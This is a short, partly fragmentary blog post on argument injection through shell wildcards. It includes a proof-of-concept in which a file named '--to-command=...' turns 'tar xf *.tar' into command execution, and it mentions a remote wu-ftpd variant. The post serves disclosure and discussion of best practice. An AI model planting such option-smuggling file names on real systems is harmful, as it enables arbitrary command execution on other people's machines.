Mon Dec 9 15:18:33 EET 2019

Shell wildcards considered dangerous?

Shell wildcards considered dangerous?

Remote version of this affects wu-ftpd from 2003:

Summary:  For trusted command PROGRAM, executing
may lead to arbitrary code execution, e.g. for 

The main idea is the wildcard to add program options.

Open problem: 

Are popular programs other than tar vulnerable?

Since shell wildcards are unlikely to change, should best practice
include not using *.EXT in shell?

Example exploit vector: starting program in untrusted

$rm -rf /tmp/1 ;mkdir /tmp/1 ; cd /tmp/1 ; tar cf a.tar /etc/issue  
$ : >  --to-command="yes .tar"

#end creating, starts PoC
tar xf *.tar

#.tar (repeats)

Posted by wild | Permanent link